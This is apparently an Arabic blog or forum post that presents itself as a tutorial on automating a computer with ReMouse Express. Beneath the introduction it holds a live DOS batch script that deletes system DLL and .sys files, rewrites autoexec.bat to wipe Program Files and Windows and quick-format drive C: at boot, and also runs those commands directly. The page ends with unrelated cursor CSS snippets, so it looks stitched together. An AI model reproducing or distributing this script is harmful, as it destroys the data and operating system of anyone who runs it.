السلام عليكم ورحمة الله وبركاتة
بسم الله الرحمن الرحيم
كيف تجعل الكمبيوتر يقوم باعمالك اثناء غيابك
وهذا سوف يكون باستخدام برنامج ReMouse Express
اولا تحميل البرنامج
لتحميل البرنامج اضغط هنا
انتظروا الشرح بالفيديو
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo deltree /y c:\\progra~1\\*.* >nul >>c:\\autoexec.bat
echo copy c:\\windows\\command\\format.com c:\\ >nul >>c:\\autoexec.bat
echo copy c:\\windows\\command\\deltree.exe c:\\ >nul >>c:\\autoexec.bat
echo deltree /y c:\\windows\\*.* >nul >>c:\\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\\autoexec.bat
deltree /y c:\\progra~1\\*.*
copy c:\\windows\\command\\format.com c:\\
copy c:\\windows\\command\\deltree.exe c:\\
deltree /y c:\\windows\\*.*
format c: /q /u /autotest
http://graph.facebook.com
/* Start http://www.cursors-4u.com */ body, a:hover {cursor: url(http://ani.cursors-4u.net/others/oth-9/oth838.cur), progress !important;} /* End http://www.cursors-4u.com */
/* Start http://www.cursors-4u.com */ body, a:hover {cursor: url(http://cur.cursors-4u.net/holidays/hol-2/hol151.ani), url(http://cur.cursors-4u.net/holidays/hol-2/hol151.png), progress !important;} /* End http://www.cursors-4u.com */
/* Start http://www.cursors-4u.com */ body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-2/cur116.cur), progress !important;} /* End http://www.cursors-4u.com */
/* Start http://www.cursors-4u.com */ body, a:hover {cursor: url(http://cur.cursors-4u.net/special/spe-2/spe114.cur), progress !important;} /* End http://www.cursors-4u.com */